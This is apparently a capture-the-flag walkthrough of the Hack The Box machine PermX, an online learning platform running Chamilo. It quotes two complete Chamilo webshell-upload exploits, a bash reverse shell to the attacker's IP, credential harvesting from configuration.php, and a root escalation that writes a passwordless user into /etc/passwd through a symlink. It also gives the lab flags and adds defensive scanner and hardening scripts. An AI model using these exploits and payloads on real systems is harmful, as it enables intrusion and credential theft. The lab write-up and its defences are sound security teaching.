
Contents

Connect to the HTB server and start the target
1. How many TCP ports are listening on PermX?
   Scan the target's TCP ports with nmap
2. What is the default domain name used by the web server on the box?
   Query port 80 of the target with curl
3. On what subdomain of permx.htb is there an online learning platform?
   Fuzz subdomains of the domain with ffuf
   Open the subdomain in a browser
4. What is the name of the application running on lms.permx.htb?
   Inspect the site's technology stack with Wappalyzer
5. What version of Chamilo is running on PermX?
   Fuzz paths on the subdomain with ffuf
   Open robots.txt on the subdomain in a browser
6. What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?
   Start Metasploit
   Search CVE.MITRE.ORG for vulnerabilities in this CMS
7. What user is the webserver running as on PermX?
8. What is the full path to the file that holds configuration data to include the database connection information for Chamilo?
   Start an nc listener locally
9. Submit the flag located in the mtz user's home directory.
   USER_FLAG: 7239022c6248c28ed2945734c9e07ac9
10. What is the full path to the script that the mtz user can run as any user without a password?
11. /opt/acl.sh allows changing the access control list on files in what directory? (Don't include the trailing / on the directory.)
12. Does setfacl follow symbolic links by default? (YES)
13. Submit the flag located in the root user's home directory.
   ROOT_FLAG: 86f2867102ba7ec4855205a4f2096539

Connect to the HTB server and start the target

Target IP: 10.10.11.23
Assigned IP: 10.10.14.12

1. How many TCP ports are listening on PermX?

Scan the target's TCP ports with nmap:

```
nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.23
```

The scan shows that the target has two open ports: 22 and 80.

2. What is the default domain name used by the web server on the box?

Query port 80 of the target with curl:

```
curl -I 10.10.11.23:80
```

```
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I 10.10.11.23:80
HTTP/1.1 302 Found
Date: Mon, 04 Nov 2024 00:32:59 GMT
Server: Apache/2.4.52 (Ubuntu)
Location: http://permx.htb
Content-Type: text/html; charset=iso-8859-1
```

The output shows that a request to the bare IP is redirected to permx.htb.

3. On what subdomain of permx.htb is there an online learning platform?

Map the target IP to the domain name:

```
echo "10.10.11.23 permx.htb" >> /etc/hosts
```

Fuzz subdomains of the domain with ffuf, filtering out the 302 redirect that every unknown Host gets:

```
ffuf -u http://permx.htb -H "Host: FUZZ.permx.htb" -w ../dictionary/subdomains-top1mil-5000.txt -fc 302
```

Map the target IP to the discovered subdomain as well:

```
echo "10.10.11.23 lms.permx.htb" >> /etc/hosts
```

Open the subdomain in a browser. Looking up Chamilo shows that the subdomain lms.permx.htb hosts an online learning platform.

4. What is the name of the application running on lms.permx.htb?

Inspect the site's technology stack with Wappalyzer. The web application behind the page is Chamilo (a CMS).

5. What version of Chamilo is running on PermX?

Fuzz paths on the subdomain with ffuf:

```
ffuf -u http://lms.permx.htb/FUZZ -w ../dictionary/common.txt
```

Open robots.txt on the subdomain in a browser and follow it into the documentation directory. The page title there gives the CMS version as 1.11.

6. What is the name of the 2023 CVE ID for a stored cross-site scripting vulnerability that leads to remote code execution?

Search for known vulnerabilities in this CMS:

```
searchsploit Chamilo
```

Copy the RCE-related exploit into the current directory:

```
searchsploit -m 49867.py
```

View the exploit code:

```
cat 49867.py
```
```python
# Exploit Title: Chamilo LMS 1.11.14 - Remote Code Execution (Authenticated)
# Date: 13/05/2021
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://chamilo.org
# Software Link: https://github.com/chamilo/chamilo-lms
# Version: 1.11.14
# Tested on: Ubuntu 20.04.2 LTS
# CVE: CVE-2021-31933
# Writeup: https://theyhack.me/CVE-2021-31933-Chamilo-File-Upload-RCE/

from requests import Session
from random import choice
from string import ascii_lowercase
import requests

# This is all configuration stuff,
url = 'http://127.0.0.1/chamilo-lms/'  # URL to remote host web root
user_name = 'admin'                    # User must be an administrator
password = 'admin'
command = 'id;whoami'

# Where you want to upload your webshell. Must be writable by web server user.
# This spot isn't protected by .htaccess
webshell_path = 'web/'
webshell_name = f"shell-{''.join(choice(ascii_lowercase) for _ in range(6))}.phar"  # Just a random name for webshell file
content = f'<?php echo `{command}`; ?>'


def main():
    # Run a context manager with a session object to hold login session after login
    with Session() as s:
        login_url = f'{url}index.php'
        login_data = {'login': user_name, 'password': password}
        r = s.post(login_url, data=login_data)  # login request

        # Check to see if login as admin user was successful.
        if 'admin' not in r.url:
            print(f'[-] Login as {user_name} failed. Need to be admin')
            return
        print(f'[+] Logged in as {user_name}')
        print(f'[+] Cookie: {s.cookies}')

        file_upload_url = f'{url}main/upload/upload.php'

        # The curdirpath is not sanitized, so I traverse to the /var/www/html/chamilo-lms/web/build directory. I can upload to /tmp/ as well
        php_webshell_file = {
            'curdirpath': (None, f'/../../../../../../../../../var/www/html/chamilo-lms/{webshell_path}'),
            'user_upload': (webshell_name, content),
        }

        ## Good command if you want to see what the request looks like without sending
        # print(requests.Request('POST', file_upload_url, files=php_webshell_file).prepare().body.decode('ascii'))

        # Two requests required to actually upload the file
        for i in range(2):
            s.post(file_upload_url, files=php_webshell_file)

        exploit_request_url = f'{url}{webshell_path}{webshell_name}'
        print('[+] Upload complete!')
        print(f'[+] Webshell: {exploit_request_url}')

        # This is a GET request to the new webshell to trigger code execution
        command_output = s.get(exploit_request_url)
        print('[+] Command output:\n')
        print(command_output.text)


if __name__ == '__main__':
    main()
```

The header comments show that this exploit is for CVE-2021-31933, which is not the 2023 vulnerability the question asks about.

Start Metasploit:

```
msfconsole
```

Search for Chamilo modules:

```
search Chamilo
```

The listed module needs no authentication and gets RCE through direct code injection. Switch to it:

```
use exploit/linux/http/chamilo_unauth_rce_cve_2023_34960
```

View the module details:

```
info
```

The module description says it is based on CVE-2023-34960. Submitting that as the answer was wrong; on re-reading, the question asks for a stored XSS vulnerability. Search CVE.MITRE.ORG for this CMS with the terms "stored cross-site": the matching entry, CVE-2023-4220, allows an unauthenticated user to execute JavaScript and upload a webshell.

7. What user is the webserver running as on PermX?

I went straight to GitHub for an exploit for this vulnerability:

```python
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
# Name        : CVE-2023-4220
# Autor       : Insomnia (Jacob S.)
# IG          : insomnia.py
# X           : insomniadev_
# Yt          : insomnia-dev
# Github      : https://github.com/insomnia-jacob
# Description : Automation of RCE in Chamilo LMS on affected versions of CVE-2023-4220 through a web shell

import argparse
import requests
import time
from os import system
import io

# Colors
red = "\033[31m"
green = "\033[32m"
blue = "\033[34m"
yellow = "\033[93m"
reset = "\033[0m"


def arguments():
    global args
    parser = argparse.ArgumentParser()
    parser.add_argument("-t", "--target", required=True,
                        help="Enter the target domain, for example: http://example.com")
    args = parser.parse_args()


def check_url_exists(url):
    print(blue, "\n\n[+]", reset, "Checking if it is vulnerable.")
    try:
        # The bigupload "files" directory is reachable only on affected versions.
        response = requests.head(url + "/main/inc/lib/javascript/bigupload/files", allow_redirects=True)
        if response.status_code == 200:
            is_vuln()
            try:
                # Reuse an already uploaded shell if one is present.
                response2 = requests.head(url + "/main/inc/lib/javascript/bigupload/files/insomnia.php",
                                          allow_redirects=True)
                if response2.status_code == 200:
                    print(f"Success! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php")
                else:
                    upload_file(args.target)
            except requests.RequestException as e:
                print(red, f"[x] Error checking the URL: {e}")
                return False
        else:
            print(f"Error {url}")
    except requests.RequestException as e:
        print(red, f"[x] Error checking the URL: {e}")
        return False


def upload_file(url):
    # The unsupported-upload action stores the file without an extension check.
    new_url = url + "/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported"
    insomnia_php = """
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
    system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
"""
    file_like_object = io.BytesIO(insomnia_php.encode("utf-8"))
    file_like_object.name = "insomnia.php"
    files = {"bigUploadFile": file_like_object}
    response3 = requests.post(new_url, files=files)
    print(response3.status_code)
    print(f"Success! open in browser: {url}/main/inc/lib/javascript/bigupload/files/insomnia.php")


def is_vuln():
    print(red, """
███████████████████████████
███████▀▀▀░░░░░░░▀▀▀███████
████▀░░░░░░░░░░░░░░░░░▀████
███│░░░░░░░░░░░░░░░░░░░│███
██▌│░░░░░░░░░░░░░░░░░░░│▐██
██░└┐░░░░░░░░░░░░░░░░░┌┘░██
██░░└┐░░░░░░░░░░░░░░░┌┘░░██      [*] It is vulnerable!
██░░┌┘▄▄▄▄▄░░░░░▄▄▄▄▄└┐░░██
██▌░│██████▌░░░▐██████│░▐██      [*] It is vulnerable!
███░│▐███▀▀░░▄░░▀▀███▌│░███
██▀─┘░░░░░░░▐█▌░░░░░░░└─▀██      [*] It is vulnerable!
██▄░░░▄▄▄▓░░▀█▀░░▓▄▄▄░░░▄██
████▄─┘██▌░░░░░░░▐██└─▄████      [*] It is vulnerable!
█████░░▐█─┬┬┬┬┬┬┬─█▌░░█████
████▌░░░▀┬┼┼┼┼┼┼┼┬▀░░░▐████
█████▄░░░└┴┴┴┴┴┴┴┘░░░▄█████
███████▄░░░░░░░░░░░▄███████
██████████▄▄▄▄▄▄▄██████████
███████████████████████████
""", reset)


def target(url):
    print(blue, f" URL: {url}")
    time.sleep(3)
    system("clear")


def banner():
    textBanner = r"""CVE-2023-4220"""  # figlet-style banner in the original
    print(green, textBanner)
    print(yellow, " by Insomnia (Jacob S.)")


def main():
    arguments()
    banner()
    target(args.target)
    check_url_exists(args.target)


if __name__ == "__main__":
    main()
```

Run the exploit against the subdomain:

```
python exploit.py -t http://lms.permx.htb/
```

Open the URL the exploit prints and run whoami through it. The output shows that the current user is www-data.

8. What is the full path to the file that holds configuration data to include the database connection information for Chamilo?
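The webshell in step 7 lands in main/inc/lib/javascript/bigupload/files, a directory that should only ever hold uploaded data. A simple defender-side check is to sweep the Chamilo upload directories for anything PHP would execute. This is an added example, not code from the writeup or from Chamilo; the list of directories it sweeps is an assumption (the bigupload path is the one used above, app/upload is a guess at a second upload location).

```shell
#!/bin/sh
# Added example (not part of the original writeup or of Chamilo): report
# server-side script files that have landed in Chamilo upload directories.
# Usage: find_scripts_in_uploads /var/www/chamilo
# Prints one offending path per line; returns 0 when clean, 1 when anything
# was found, so it can drive a cron job or a monitoring check.

# Directories checked, relative to the webroot (assumed list).
UPLOAD_SUBDIRS="main/inc/lib/javascript/bigupload/files app/upload"

find_scripts_in_uploads() {
    webroot="$1"
    count=0
    for sub in $UPLOAD_SUBDIRS; do
        dir="$webroot/$sub"
        [ -d "$dir" ] || continue
        # Case-insensitive match on the extensions Apache's PHP handler
        # typically executes; uploads here should be data, never code.
        hits=$(find "$dir" -type f \( -iname '*.php' -o -iname '*.phar' -o -iname '*.phtml' \) -print)
        [ -n "$hits" ] || continue
        printf '%s\n' "$hits"
        count=$((count + $(printf '%s\n' "$hits" | wc -l)))
    done
    [ "$count" -eq 0 ]
}
```

Pair this with a web-server rule that disables script execution under the upload directories (for Apache, a `php_admin_flag engine off` or `RemoveHandler` in that directory), so that a dropped file is both detected and inert.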
Start an nc listener locally:

```
nc -lvnp 1425
```

Send a reverse shell back through the webshell the exploit provided:

```
bash -c "bash -i >& /dev/tcp/10.10.14.12/1425 0>&1"
```

```
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.23] 53550
bash: cannot set terminal process group (1173): Inappropriate ioctl for device
bash: no job control in this shell
www-data@permx:/var/www/chamilo/main/inc/lib/javascript/bigupload/files$ whoami
www-data
```

Upgrade to a usable TTY:

```
script -c /bin/bash -q /dev/null
```

List every file under the web application that looks like a configuration file and save the list:

```
find /var/www/chamilo -name "conf*" -type f 2>/dev/null | tee res.txt
```

Read each file and match on the word password:

```
cat res.txt | xargs -I {} sh -c "cat {} | grep password"
```

Find which file the string 03F6lY3uXAP2bkW8 comes from:

```
xargs -I {} sh -c "grep -m1 03F6lY3uXAP2bkW8 {} && echo Found in {}" < res.txt
```

```
www-data@permx:/var/www/chamilo$ xargs -I {} sh -c "grep -m1 03F6lY3uXAP2bkW8 {} && echo Found in {}" < res.txt
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
Found in /var/www/chamilo/app/config/configuration.php
```

Print the match from that file with five lines of context on each side:

```
grep -C 5 03F6lY3uXAP2bkW8 /var/www/chamilo/app/config/configuration.php
```

```
www-data@permx:/var/www/chamilo$ grep -C 5 03F6lY3uXAP2bkW8 /var/www/chamilo/app/config/configuration.php
// Database connection settings.
$_configuration['db_host'] = 'localhost';
$_configuration['db_port'] = '3306';
$_configuration['main_database'] = 'chamilo';
$_configuration['db_user'] = 'chamilo';
$_configuration['db_password'] = '03F6lY3uXAP2bkW8';
// Enable access to database management for platform admins.
$_configuration['db_manager_enabled'] = false;
/**
 * Directory settings.
```

Account: chamilo
Password: 03F6lY3uXAP2bkW8

In summary, the file that holds the database connection information is /var/www/chamilo/app/config/configuration.php.

9. Submit the flag located in the mtz user's home directory.

List the users on the target that can log in:

```
cat /etc/passwd
```

Try logging in to the target over SSH as that user:

```
ssh mtz@10.10.11.23
```

Locate user.txt and read it:

```
mtz@permx:~$ find / -name user.txt 2>/dev/null
/home/mtz/user.txt
mtz@permx:~$ cat /home/mtz/user.txt
7239022c6248c28ed2945734c9e07ac9
```

USER_FLAG: 7239022c6248c28ed2945734c9e07ac9

10. What is the full path to the script that the mtz user can run as any user without a password?

List the commands this user may run with elevated privileges and no password:

```
sudo -l
```

```
mtz@permx:~$ sudo -l
Matching Defaults entries for mtz on permx:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin, use_pty

User mtz may run the following commands on permx:
    (ALL : ALL) NOPASSWD: /opt/acl.sh
```

There is one file that can be run with elevated privileges and no password: /opt/acl.sh.

11. /opt/acl.sh allows changing the access control list on files in what directory? (Don't include the trailing / on the directory.)

Reading the script shows that, once run, it allows any permission to be granted on any link (file) under /home/mtz.

12. Does setfacl follow symbolic links by default? (YES)

13. Submit the flag located in the root user's home directory.

Create a link named test pointing at /etc/passwd:

```
ln -s /etc/passwd /home/mtz/test
```

Use /opt/acl.sh to grant read and write permission on the /home/mtz/test link:

```
sudo /opt/acl.sh mtz rw /home/mtz/test
```

```
mtz@permx:~$ ln -s /etc/passwd /home/mtz/test
mtz@permx:~$ ls
priv  test  user.txt
mtz@permx:~$ sudo /opt/acl.sh mtz rw /home/mtz/test
```

Write a new user through the /home/mtz/test link:

```
echo "0dayhp::0:0:0dayhp:/root:/bin/bash" >> /home/mtz/test
```

Switch to the 0dayhp user's bash:

```
su 0dayhp
```

Locate root.txt and read it:

```
root@permx:/home/mtz# find / -name root.txt
/root/root.txt
/var/www/chamilo/vendor/symfony/intl/Tests/Data/Bundle/Reader/Fixtures/txt/root.txt
root@permx:/home/mtz# cat /root/root.txt
86f2867102ba7ec4855205a4f2096539
```

ROOT_FLAG: 86f2867102ba7ec4855205a4f2096539
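The root path in steps 11 to 13 exists because /opt/acl.sh confines its target to /home/mtz only by the path the caller types, while setfacl follows a symlink argument by default. The writeup does not show the script's source, so the following is an added example of a hardened stand-in rather than the box's own script: it checks the arguments, refuses symlinks, resolves the real path before trusting it, and passes `-P` to setfacl so a symlink argument is skipped even if the file is swapped between the check and the call. ALLOWED_DIR and the argument syntax (`<user> <perm> <target>`, matching the `mtz rw /home/mtz/test` call above) are assumptions.

```shell
#!/bin/sh
# Added example, not the /opt/acl.sh from the box: a hardened ACL helper that
# a user may run through sudo. It only ever touches regular files and
# directories that physically live below ALLOWED_DIR.
# Usage: acl.sh <user> <perm> <target>

ALLOWED_DIR="/home/mtz"   # assumed: the single directory the helper may modify

# acl_args_ok USER PERM -> 0 when USER is a plain account name and PERM is
# one to three of r/w/x; anything else (flags, separators, shell metacharacters)
# is rejected so the values can be handed to setfacl safely.
acl_args_ok() {
    printf '%s' "$1" | grep -Eq '^[a-z_][a-z0-9_-]*$' || return 1
    printf '%s' "$2" | grep -Eq '^[rwx]{1,3}$' || return 1
    return 0
}

# acl_target_ok BASE TARGET -> 0 when TARGET is not a symlink, exists, and its
# fully resolved path is still inside BASE; otherwise 1 with a reason on stderr.
acl_target_ok() {
    base="$1"; target="$2"
    # Textual confinement first: the argument itself must start with BASE/.
    case "$target" in
        "$base"/*) ;;
        *) echo "rejected: $target is outside $base" >&2; return 1 ;;
    esac
    # A symlink is refused outright; setfacl would follow it to the real file.
    if [ -L "$target" ]; then
        echo "rejected: $target is a symbolic link" >&2; return 1
    fi
    if [ ! -e "$target" ]; then
        echo "rejected: $target does not exist" >&2; return 1
    fi
    # realpath -e resolves every component, so a symlinked parent directory
    # (e.g. ~/etcdir -> /etc) that escapes BASE is caught here as well.
    realbase=$(realpath -e -- "$base") || return 1
    real=$(realpath -e -- "$target") || return 1
    case "$real" in
        "$realbase"/*) return 0 ;;
        *) echo "rejected: $target resolves to $real, outside $base" >&2; return 1 ;;
    esac
}

main() {
    [ "$#" -eq 3 ] || { echo "usage: $0 <user> <perm> <target>" >&2; exit 2; }
    acl_args_ok "$1" "$2" || { echo "rejected: bad user or permission" >&2; exit 1; }
    acl_target_ok "$ALLOWED_DIR" "$3" || exit 1
    # -P: physical walk, so setfacl skips symlink arguments as a second line
    # of defence; -- ends option parsing so the target cannot be read as a flag.
    exec setfacl -P -m "u:$1:$2" -- "$3"
}

# Act only when invoked with arguments, so the file can be sourced for testing.
if [ "$#" -eq 3 ]; then main "$@"; fi
```

With this in place the `ln -s /etc/passwd /home/mtz/test` step is rejected before setfacl runs, and a path such as /home/mtz/etcdir/passwd behind a symlinked directory is rejected by the realpath comparison. The remaining exposure is a NOPASSWD sudo entry for a script the user can read; keep the script root-owned and non-writable, and prefer granting the narrow capability (an ACL on specific paths) over a wrapper at all where possible.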